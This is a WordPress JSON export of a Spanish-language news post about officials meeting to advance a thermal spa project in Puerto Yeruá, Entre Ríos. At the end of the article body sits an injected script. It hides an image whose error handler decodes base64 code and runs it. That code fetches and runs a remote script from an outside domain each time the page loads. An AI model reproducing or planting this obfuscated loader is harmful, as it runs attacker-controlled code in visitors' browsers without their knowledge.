{"id":5811,"date":"2022-09-20T11:29:13","date_gmt":"2022-09-20T14:29:13","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5811"},"modified":"2025-08-13T16:12:51","modified_gmt":"2025-08-13T19:12:51","slug":"buscan-concretar-avances-para-el-proyecto-termal-de-puerto-yerua","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5811","title":{"rendered":"Buscan concretar avances para el proyecto termal de Puerto Yeru\u00e1"},"content":{"rendered":"\n<h5 class=\"has-black-color has-text-color has-background wp-block-heading\" style=\"background-color:#07bde3\"><strong><em>Autoridades de CAFESG, del Ente Termal de la provincia de Entre R\u00edos y el intendente de la localidad se reunieron en vistas a la definici\u00f3n de la localizaci\u00f3n del predio y a los aspectos t\u00e9cnicos del procedimiento licitatorio.<\/em><\/strong><\/h5>\n\n\n\n<p>Seg\u00fan se inform\u00f3, el vocal y coordinador del \u00c1rea de Desarrollo de CAFESG, Eduardo Asueta, el presidente del Ente Termal de la Provincia, Ram\u00f3n Barrera, y el intendente de Puerto Yeru\u00e1, Daniel Ben\u00edtez, se reunieron para avanzar en lo que ser\u00e1 el proyecto termal para la localidad del departamento Concordia.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">Termas<\/h5>\n\n\n\n<p>Al respecto, Asueta sostuvo que ven \u00abcon buenos ojos este proyecto y entendemos que es un buen momento para desarrollarlo porque sabemos del empuje que siempre ha tenido el Gobernador con la cuesti\u00f3n tur\u00edstica, y termal en particular\u00bb.<br><br>Por su parte, Ben\u00edtez resalt\u00f3 \u00abla importancia de la presencia de funcionarios de dos organismos provinciales, porque sin el apoyo provincial no hay proyecto posible; el Gobernador nos ha alentado a seguir trabajando fuerte este proyecto\u00bb. Adem\u00e1s, inform\u00f3 que \u00abhemos tomado la decisi\u00f3n de contratar a una consultora especializada en turismo termal para desarrollar un programa general para nuestra localidad.<br><br>Por \u00faltimo, Barrera dio cuenta que \u00abes nuestra funci\u00f3n, en tanto autoridad de aplicaci\u00f3n, la de asistir t\u00e9cnicamente y adem\u00e1s acompa\u00f1ar los procesos, para que estos proyectos se concreten\u00bb.<br><br>\u00abEl de Puerto Yeru\u00e1 es uno de los m\u00e1s interesantes que tenemos en la Provincia, por la calidad de las aguas, por el valor paisaj\u00edstico y por lo que significa esta localidad\u00bb, remat\u00f3 el funcionario.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.entrerios.gov.ar\/termas\/index.php?codigo=3&amp;cod=159&amp;codtiponoticia=1&amp;noticia=ver_noticia&amp;modulo=noticia\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/Captura-web_20-9-2022_112721_www.entrerios.gov_.ar_.jpeg\" alt=\"\" class=\"wp-image-5812\" width=\"346\" height=\"63\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/Captura-web_20-9-2022_112721_www.entrerios.gov_.ar_.jpeg 654w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/Captura-web_20-9-2022_112721_www.entrerios.gov_.ar_-300x55.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/Captura-web_20-9-2022_112721_www.entrerios.gov_.ar_-320x58.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/Captura-web_20-9-2022_112721_www.entrerios.gov_.ar_-480x87.jpeg 480w\" sizes=\"(max-width: 346px) 100vw, 346px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Autoridades de CAFESG, del Ente Termal de la provincia de Entre R\u00edos y el intendente de la localidad se reunieron en vistas a la definici\u00f3n de la localizaci\u00f3n del predio y a los aspectos t\u00e9cnicos del procedimiento licitatorio. Seg\u00fan se inform\u00f3, el vocal y coordinador del \u00c1rea de Desarrollo de CAFESG, Eduardo Asueta, el presidente [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5813,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17],"tags":[],"class_list":["post-5811","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5811","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5811"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5811\/revisions"}],"predecessor-version":[{"id":10578,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5811\/revisions\/10578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5813"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5811"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5811"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5811"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}